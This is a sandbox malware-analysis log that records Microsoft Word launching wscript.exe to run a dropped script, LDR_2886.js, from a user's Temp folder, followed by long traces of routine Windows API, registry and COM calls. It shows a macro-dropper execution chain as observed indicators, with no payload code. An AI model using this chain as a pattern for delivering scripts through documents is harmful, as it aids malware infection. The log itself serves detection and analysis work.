# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: Jul 9 2019 16:03:52 # Log Creation Date: 26.07.2019 16:45:09.350 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe" page_root = "0x3e3b8000" os_pid = "0x910" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "64" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x9b8 Thread: id = 2 os_tid = 0x9b4 Thread: id = 3 os_tid = 0x9a0 Thread: id = 4 os_tid = 0x99c Thread: id = 5 os_tid = 0x98c Thread: id = 6 os_tid = 0x988 Thread: id = 7 os_tid = 0x984 Thread: id = 8 os_tid = 0x97c Thread: id = 9 os_tid = 0x974 Thread: id = 10 os_tid = 0x970 Thread: id = 11 os_tid = 0x96c Thread: id = 12 os_tid = 0x960 Thread: id = 13 os_tid = 0x954 Thread: id = 14 os_tid = 0x950 Thread: id = 15 os_tid = 0x94c Thread: id = 16 os_tid = 0x928 Thread: id = 17 os_tid = 0x924 Thread: id = 18 os_tid = 0x920 Thread: id = 19 os_tid = 0x91c Thread: id = 20 os_tid = 0x918 Thread: id = 21 os_tid = 0x914 Thread: id = 22 os_tid = 0xa2c Thread: id = 23 os_tid = 0xa44 Thread: id = 24 os_tid = 0xb54 Thread: id = 26 os_tid = 0xb60 Thread: id = 34 os_tid = 0xba0 Thread: id = 36 os_tid = 0xbac Thread: id = 50 os_tid = 0x52c Thread: id = 54 os_tid = 0x8f0 Thread: id = 68 os_tid = 0x80c Thread: id = 97 os_tid = 0x940 Thread: id = 102 os_tid = 0x4f4 Thread: id = 103 os_tid = 0x978 Thread: id = 110 os_tid = 0x260 Thread: id = 112 os_tid = 0x874 Thread: id = 114 os_tid = 0x90 Thread: id = 130 os_tid = 0xa20 Thread: id = 131 os_tid = 0xa3c Thread: id = 132 os_tid = 0xa34 Thread: id = 134 os_tid = 0xad4 Thread: id = 145 os_tid = 0x858 Thread: id = 147 os_tid = 0xbc0 Thread: id = 161 os_tid = 0x8d4 Thread: id = 162 os_tid = 0x820 Thread: id = 164 os_tid = 0x8f8 Thread: id = 166 os_tid = 0x8c8 Thread: id = 177 os_tid = 0x5c8 Thread: id = 183 os_tid = 0xbe4 Thread: id = 189 os_tid = 0xa3c Thread: id = 192 os_tid = 0xb08 Thread: id = 209 os_tid = 0x71c Thread: id = 210 os_tid = 0x6bc Thread: id = 212 os_tid = 0xb84 Thread: id = 214 os_tid = 0x5cc Thread: id = 226 os_tid = 0x8d4 Thread: id = 230 os_tid = 0x178 Thread: id = 239 os_tid = 0x6fc Thread: id = 250 os_tid = 0x70c Thread: id = 256 os_tid = 0x4f4 Thread: id = 258 os_tid = 0xa3c Thread: id = 263 os_tid = 0x4b4 Thread: id = 265 os_tid = 0x9a8 Thread: id = 274 os_tid = 0x184 Thread: id = 277 os_tid = 0xb84 Thread: id = 278 os_tid = 0x6fc Thread: id = 280 os_tid = 0x95c Thread: id = 288 os_tid = 0xa3c Thread: id = 290 os_tid = 0x8cc Thread: id = 298 os_tid = 0x6ec Thread: id = 300 os_tid = 0x288 Thread: id = 348 os_tid = 0xd04 Thread: id = 350 os_tid = 0xd0c Thread: id = 352 os_tid = 0xd1c Thread: id = 353 os_tid = 0xd20 Thread: id = 354 os_tid = 0xd28 Thread: id = 356 os_tid = 0xd58 Thread: id = 376 os_tid = 0xf10 Process: id = "2" image_name = "wscript.exe" filename = "c:\\windows\\system32\\wscript.exe" page_root = "0x2857d000" os_pid = "0xb58" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x910" cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" " cur_dir = "C:\\Users\\aETAdzjz\\Documents\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "64" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0xb5c [0043.612] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25fe00 | out: lpSystemTimeAsFileTime=0x25fe00*(dwLowDateTime=0x940c7d50, dwHighDateTime=0x1d543d1)) [0043.613] GetCurrentProcessId () returned 0xb58 [0043.613] GetCurrentThreadId () returned 0xb5c [0043.613] GetTickCount () returned 0x1c773 [0043.613] QueryPerformanceCounter (in: lpPerformanceCount=0x25fe08 | out: lpPerformanceCount=0x25fe08*=16803872105) returned 1 [0043.613] GetStartupInfoA (in: lpStartupInfo=0x25fe20 | out: lpStartupInfo=0x25fe20*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) [0043.614] GetModuleHandleA (lpModuleName=0x0) returned 0xff410000 [0043.614] GetModuleHandleA (lpModuleName=0x0) returned 0xff410000 [0043.614] GetVersionExA (in: lpVersionInformation=0x25fd40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x3f1eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x25fd40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0043.614] GetUserDefaultLCID () returned 0x409 [0043.614] CoInitialize (pvReserved=0x0) returned 0x0 [0044.101] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" " [0044.101] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85 [0044.101] ??2@YAPEAX_K@Z () returned 0xd57b0 [0044.102] ??2@YAPEAX_K@Z () returned 0xd5f60 [0044.103] GetCurrentThreadId () returned 0xb5c [0044.103] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25fa88 | out: phkResult=0x25fa88*=0x7c) returned 0x0 [0044.103] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25fa80 | out: phkResult=0x25fa80*=0x80) returned 0x0 [0044.103] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x25ed88, lpData=0x25f190, lpcbData=0x25ed80*=0x400 | out: lpType=0x25ed88*=0x0, lpData=0x25f190*=0x67, lpcbData=0x25ed80*=0x400) returned 0x2 [0044.103] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x25ed88, lpData=0x25f190, lpcbData=0x25ed80*=0x400 | out: lpType=0x25ed88*=0x0, lpData=0x25f190*=0x67, lpcbData=0x25ed80*=0x400) returned 0x2 [0044.103] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x25ed88, lpData=0x25f190, lpcbData=0x25ed80*=0x400 | out: lpType=0x25ed88*=0x0, lpData=0x25f190*=0x67, lpcbData=0x25ed80*=0x400) returned 0x2 [0044.103] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0044.542] RegCloseKey (hKey=0x80) returned 0x0 [0044.542] RegCloseKey (hKey=0x7c) returned 0x0 [0044.542] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f7a0 | out: phkResult=0x25f7a0*=0x7c) returned 0x0 [0044.543] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f798 | out: phkResult=0x25f798*=0x80) returned 0x0 [0044.543] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x25eaa8, lpData=0x25eeb0, lpcbData=0x25eaa0*=0x400 | out: lpType=0x25eaa8*=0x0, lpData=0x25eeb0*=0x0, lpcbData=0x25eaa0*=0x400) returned 0x2 [0044.543] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x25eaa8, lpData=0x25eeb0, lpcbData=0x25eaa0*=0x400 | out: lpType=0x25eaa8*=0x0, lpData=0x25eeb0*=0x0, lpcbData=0x25eaa0*=0x400) returned 0x2 [0044.543] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x25eaa8, lpData=0x25eeb0, lpcbData=0x25eaa0*=0x400 | out: lpType=0x25eaa8*=0x0, lpData=0x25eeb0*=0x0, lpcbData=0x25eaa0*=0x400) returned 0x2 [0044.543] RegCloseKey (hKey=0x80) returned 0x0 [0044.543] RegCloseKey (hKey=0x7c) returned 0x0 [0044.543] GetACP () returned 0x4e4 [0044.543] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000 [0044.544] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0 [0044.544] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0044.544] FreeLibrary (hLibModule=0x77040000) returned 1 [0044.544] ??2@YAPEAX_K@Z () returned 0xd5f80 [0044.544] CoRegisterMessageFilter (in: lpMessageFilter=0xd5f80, lplpMessageFilter=0xd5f90 | out: lplpMessageFilter=0xd5f90*=0x0) returned 0x0 [0044.544] GetModuleFileNameW (in: hModule=0xff410000, lpFilename=0x25fae0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f [0044.545] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x25f430 | out: lpdwHandle=0x25f430) returned 0x704 [0044.545] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x25ed20 | out: lpData=0x25ed20) returned 1 [0044.545] VerQueryValueW (in: pBlock=0x25ed20, lpSubBlock="\\", lplpBuffer=0x25f438, puLen=0x25f434 | out: lplpBuffer=0x25f438*=0x25ed48, puLen=0x25f434) returned 1 [0044.545] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f488 | out: phkResult=0x25f488*=0x7c) returned 0x0 [0044.545] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x25e7d8, lpData=0x25ebe0, lpcbData=0x25e7d0*=0x400 | out: lpType=0x25e7d8*=0x0, lpData=0x25ebe0*=0x0, lpcbData=0x25e7d0*=0x400) returned 0x2 [0044.545] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x25f440 | out: phkResult=0x25f440*=0x80) returned 0x0 [0044.545] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x25f404, lpData=0x25f480, lpcbData=0x25f400*=0x4 | out: lpType=0x25f404*=0x0, lpData=0x25f480*=0xb0, lpcbData=0x25f400*=0x4) returned 0x2 [0044.546] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x25e7d8, lpData=0x25ebe0, lpcbData=0x25e7d0*=0x400 | out: lpType=0x25e7d8*=0x0, lpData=0x25ebe0*=0x0, lpcbData=0x25e7d0*=0x400) returned 0x2 [0044.546] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x25f404, lpData=0x25f480, lpcbData=0x25f400*=0x4 | out: lpType=0x25f404*=0x0, lpData=0x25f480*=0xb0, lpcbData=0x25f400*=0x4) returned 0x2 [0044.546] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x25e7d8, lpData=0x25ebe0, lpcbData=0x25e7d0*=0x400 | out: lpType=0x25e7d8*=0x1, lpData="1", lpcbData=0x25e7d0*=0x4) returned 0x0 [0044.546] lstrlenW (lpString="1") returned 1 [0044.546] lstrlenW (lpString="0") returned 1 [0044.546] lstrlenW (lpString="1") returned 1 [0044.546] lstrlenW (lpString="no") returned 2 [0044.546] lstrlenW (lpString="1") returned 1 [0044.546] lstrlenW (lpString="false") returned 5 [0044.546] RegCloseKey (hKey=0x80) returned 0x0 [0044.546] RegCloseKey (hKey=0x7c) returned 0x0 [0044.546] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x25f488, lpdwDisposition=0x0 | out: phkResult=0x25f488*=0x7c, lpdwDisposition=0x0) returned 0x0 [0044.546] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x25f424, lpData=0x25f480, lpcbData=0x25f420*=0x4 | out: lpType=0x25f424*=0x0, lpData=0x25f480*=0xb0, lpcbData=0x25f420*=0x4) returned 0x2 [0044.546] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x25e7f8, lpData=0x25ec00, lpcbData=0x25e7f0*=0x400 | out: lpType=0x25e7f8*=0x1, lpData="1", lpcbData=0x25e7f0*=0x4) returned 0x0 [0044.546] lstrlenW (lpString="1") returned 1 [0044.546] lstrlenW (lpString="0") returned 1 [0044.546] lstrlenW (lpString="1") returned 1 [0044.546] lstrlenW (lpString="no") returned 2 [0044.546] lstrlenW (lpString="1") returned 1 [0044.546] lstrlenW (lpString="false") returned 5 [0044.546] RegCloseKey (hKey=0x7c) returned 0x0 [0044.546] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x25f488, lpdwDisposition=0x0 | out: phkResult=0x25f488*=0x7c, lpdwDisposition=0x0) returned 0x0 [0044.546] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x25f424, lpData=0x25f480, lpcbData=0x25f420*=0x4 | out: lpType=0x25f424*=0x0, lpData=0x25f480*=0xb0, lpcbData=0x25f420*=0x4) returned 0x2 [0044.546] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x25e7f8, lpData=0x25ec00, lpcbData=0x25e7f0*=0x400 | out: lpType=0x25e7f8*=0x0, lpData=0x25ec00*=0x31, lpcbData=0x25e7f0*=0x400) returned 0x2 [0044.547] RegCloseKey (hKey=0x7c) returned 0x0 [0044.547] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48 [0044.547] lstrlenW (lpString="js") returned 2 [0044.547] lstrlenW (lpString="WSH") returned 3 [0044.547] ??2@YAPEAX_K@Z () returned 0xd5870 [0044.547] LoadStringW (in: hInstance=0xff410000, uID=0x9c5, lpBuffer=0x25def0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0044.547] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x25ef30*=0x0 | out: pptlib=0x25ef30*=0x41d100) returned 0x0 [0044.554] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xff4158f0, ppTInfo=0x25ef18 | out: ppTInfo=0x25ef18*=0x41e4e8) returned 0x0 [0044.556] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e4e8, index=0xffffffff, pRefType=0x25ef10 | out: pRefType=0x25ef10*=0xfffffffe) returned 0x0 [0044.556] ITypeInfo:GetRefTypeInfo (in: This=0x41e4e8, hreftype=0xfffffffe, ppTInfo=0xff42f458 | out: ppTInfo=0xff42f458*=0x41e540) returned 0x0 [0044.556] IUnknown:Release (This=0x41e4e8) returned 0x1 [0044.556] ??2@YAPEAX_K@Z () returned 0xd5900 [0044.556] ??2@YAPEAX_K@Z () returned 0xd59a0 [0044.556] ??2@YAPEAX_K@Z () returned 0xd5a00 [0044.556] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xff415950, ppTInfo=0x25ef18 | out: ppTInfo=0x25ef18*=0x41e598) returned 0x0 [0044.556] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e598, index=0xffffffff, pRefType=0x25ef10 | out: pRefType=0x25ef10*=0xfffffffe) returned 0x0 [0044.556] ITypeInfo:GetRefTypeInfo (in: This=0x41e598, hreftype=0xfffffffe, ppTInfo=0xff42f4d8 | out: ppTInfo=0xff42f4d8*=0x41e5f0) returned 0x0 [0044.556] IUnknown:Release (This=0x41e598) returned 0x1 [0044.556] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xff415960, ppTInfo=0x25ef18 | out: ppTInfo=0x25ef18*=0x41e648) returned 0x0 [0044.556] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e648, index=0xffffffff, pRefType=0x25ef10 | out: pRefType=0x25ef10*=0xfffffffe) returned 0x0 [0044.556] ITypeInfo:GetRefTypeInfo (in: This=0x41e648, hreftype=0xfffffffe, ppTInfo=0xff42f518 | out: ppTInfo=0xff42f518*=0x41e6a0) returned 0x0 [0044.556] IUnknown:Release (This=0x41e648) returned 0x1 [0044.556] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xff415910, ppTInfo=0x25ef18 | out: ppTInfo=0x25ef18*=0x41e6f8) returned 0x0 [0044.556] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e6f8, index=0xffffffff, pRefType=0x25ef10 | out: pRefType=0x25ef10*=0xfffffffe) returned 0x0 [0044.556] ITypeInfo:GetRefTypeInfo (in: This=0x41e6f8, hreftype=0xfffffffe, ppTInfo=0xff42f498 | out: ppTInfo=0xff42f498*=0x41e750) returned 0x0 [0044.556] IUnknown:Release (This=0x41e6f8) returned 0x1 [0044.557] IUnknown:Release (This=0x41d100) returned 0x4 [0044.557] ??2@YAPEAX_K@Z () returned 0xd5a60 [0044.557] GetCurrentThreadId () returned 0xb5c [0044.557] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc [0044.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff421cf8, lpParameter=0xd5a60, dwCreationFlags=0x0, lpThreadId=0xd5a88 | out: lpThreadId=0xd5a88*=0xb68) returned 0xd4 [0044.557] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x25f170*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0044.664] CloseHandle (hObject=0xcc) returned 1 [0044.664] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x25f200, lpFilePart=0x25f1f0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x25f1f0*="LDR_2886.js") returned 0x30 [0044.664] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e710 | out: phkResult=0x25e710*=0xe6) returned 0x0 [0044.665] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x25e6c0, lpData=0x25e720, lpcbData=0x25e6c4*=0x800 | out: lpType=0x25e6c0*=0x1, lpData="JSFile", lpcbData=0x25e6c4*=0xe) returned 0x0 [0044.665] RegCloseKey (hKey=0xe6) returned 0x0 [0044.665] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e710 | out: phkResult=0x25e710*=0xe6) returned 0x0 [0044.665] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x25e6c0, lpData=0x25ef90, lpcbData=0x25e6c4*=0x200 | out: lpType=0x25e6c0*=0x1, lpData="JScript", lpcbData=0x25e6c4*=0x10) returned 0x0 [0044.665] RegCloseKey (hKey=0xe6) returned 0x0 [0044.665] ??2@YAPEAX_K@Z () returned 0xd63a0 [0044.665] GetProcessHeap () returned 0x3f0000 [0044.665] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x2000) returned 0x428430 [0044.666] CLSIDFromString (in: lpsz="JScript", pclsid=0x25ef08 | out: pclsid=0x25ef08*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0 [0044.666] CoCreateInstance (in: rclsid=0x25ef08*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff411800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25ef00 | out: ppv=0x25ef00*=0xd6780) returned 0x0 [0045.173] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25d100 | out: lpSystemTimeAsFileTime=0x25d100*(dwLowDateTime=0x94b772f0, dwHighDateTime=0x1d543d1)) [0045.173] GetCurrentProcessId () returned 0xb58 [0045.173] GetCurrentThreadId () returned 0xb5c [0045.173] GetTickCount () returned 0x1cbd6 [0045.173] QueryPerformanceCounter (in: lpPerformanceCount=0x25d108 | out: lpPerformanceCount=0x25d108*=16959931693) returned 1 [0045.178] malloc (_Size=0x100) returned 0xd6670 [0045.178] __dllonexit () returned 0x7fee3310728 [0045.179] __dllonexit () returned 0x7fee3310780 [0045.179] __dllonexit () returned 0x7fee3310750 [0045.179] __dllonexit () returned 0x7fee33107b0 [0045.180] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000 [0045.180] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570 [0045.180] EtwRegisterTraceGuidsA () returned 0x0 [0045.181] EtwRegisterTraceGuidsA () returned 0x0 [0045.181] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x25ccf0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f [0045.182] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0 [0045.182] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x25ce58 | out: phkResult=0x25ce58*=0x0) returned 0x2 [0045.187] GetVersion () returned 0x1db10106 [0045.188] ??2@YAPEAX_K@Z () returned 0xd5aa0 [0045.189] ??2@YAPEAX_K@Z () returned 0xd6780 [0045.189] GetUserDefaultLCID () returned 0x409 [0045.189] GetACP () returned 0x4e4 [0045.189] ??3@YAXPEAX@Z () returned 0x1dd30701 [0045.189] GetCurrentThreadId () returned 0xb5c [0045.189] ??2@YAPEAX_K@Z () returned 0xd5aa0 [0045.189] GetCurrentThreadId () returned 0xb5c [0045.189] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x25ee38 | out: phkResult=0x25ee38*=0x104) returned 0x0 [0045.190] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegQueryValueExA") returned 0x7fefd72c480 [0045.190] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x25ee30, lpData=0x25ee28, lpcbData=0x25ee20*=0x4 | out: lpType=0x25ee30*=0x4, lpData=0x25ee28*=0x1, lpcbData=0x25ee20*=0x4) returned 0x0 [0045.190] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710 [0045.190] RegCloseKey (hKey=0x104) returned 0x0 [0045.190] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000 [0045.190] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920 [0045.190] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000 [0045.190] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490 [0045.190] CoCreateInstance (in: rclsid=0x7fee337cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee337cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25ee00 | out: ppv=0x25ee00*=0x7fefec0a1b0) returned 0x0 [0045.192] ??2@YAPEAX_K@Z () returned 0xd6b30 [0045.192] ??2@YAPEAX_KHPEBDH@Z () returned 0xd5af0 [0045.192] ??2@YAPEAX_K@Z () returned 0xd6bf0 [0045.192] ??2@YAPEAX_K@Z () returned 0xd6c50 [0045.192] ??2@YAPEAX_K@Z () returned 0xd7140 [0045.192] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x25edc0, nSize=0x27 | out: lpBuffer="") returned 0x0 [0045.192] GetUserDefaultLCID () returned 0x409 [0045.192] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0045.193] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x25ee60, cchData=6 | out: lpLCData="1252") returned 5 [0045.193] IsValidCodePage (CodePage=0x4e4) returned 1 [0045.193] CoCreateInstance (in: rclsid=0x7fee3375d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee3375d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0xd6af0 | out: ppv=0xd6af0*=0x4275b0) returned 0x0 [0045.193] IUnknown:AddRef (This=0x4275b0) returned 0x2 [0045.193] GetCurrentProcessId () returned 0xb58 [0045.193] GetCurrentThreadId () returned 0xb5c [0045.193] GetTickCount () returned 0x1cbf5 [0045.193] ISystemDebugEventFire:BeginSession (This=0x4275b0, guidSourceID=0x7fee3375da8, strSessionName="JScript:00002904:00002908:18117749") returned 0x0 [0045.193] GetCurrentThreadId () returned 0xb5c [0045.193] ??2@YAPEAX_K@Z () returned 0xd71e0 [0045.193] ??2@YAPEAX_K@Z () returned 0xd7230 [0045.193] malloc (_Size=0x80) returned 0xd72e0 [0045.193] malloc (_Size=0x108) returned 0xd7370 [0045.193] GetTickCount () returned 0x1cbf5 [0045.193] GetCurrentThreadId () returned 0xb5c [0045.193] ??2@YAPEAX_K@Z () returned 0xd7480 